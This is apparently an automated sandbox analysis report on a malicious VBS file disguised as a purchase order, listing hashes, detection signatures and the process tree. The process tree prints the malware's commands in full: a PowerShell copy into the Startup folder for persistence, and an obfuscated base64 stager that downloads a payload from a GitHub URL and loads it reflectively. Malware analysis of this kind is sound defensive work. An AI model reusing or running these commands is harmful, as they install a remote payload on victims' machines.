Overview

overview

10

Static

static

1

Purchase O...95.vbs

windows7-x64

10

Purchase O...95.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2024 07:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Purchase Order - PO14895.vbs

  • Size

    486KB

  • MD5

    411a23153d97ad4c071a62d54e928d6b

  • SHA1

    f1fc194cf23bd614ed793037f6700c565e88b11b

  • SHA256

    cf85e5927fe85ba85cd070fcc7a6fdf206625e836a9194143f789d24ed1671ab

  • SHA512

    a245a3c469c760e11dc74a1f7ea0762da5dc2fc7e23d2688fc3270678c1f1b32964be276b1912a9d637557d4715d920ca8e0e79008264b355aa360025d235c59

  • SSDEEP

    12288:464azKbI45msgYvWtcg7qKsxNksRgTJct4AqHpE0pZvSmO9FuhFz3VGMIQbPxur5:FEaPqH1

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Purchase Order - PO14895.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    261c2b74280cf02ff2eeec19f5effa0f

    SHA1

    aecd3c19eb95c92e4706c09064c4ffebe764e96f

    SHA256

    a04985db6346f8e2c2c7d9ca9e1d3f32c95d77fc2576b9e4ceb1b985a3496f4b

    SHA512

    cd3af2bf883834c6bc3be93bf95f7622012718f6e21f61e683109849778d012a8fd4067fb98fe3f54d2c10187fed20f1175e5705d9c66650c5894d7ad7c8ff04

    Download Submit

  • memory/2412-7-0x00000000026F0000-0x00000000026F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2412-5-0x000007FEF606E000-0x000007FEF606F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2412-10-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-9-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-11-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-12-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-13-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-8-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-6-0x000000001B7A0000-0x000000001BA82000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2892-19-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2892-20-0x0000000002790000-0x0000000002798000-memory.dmp

    Filesize

    32KB

    Download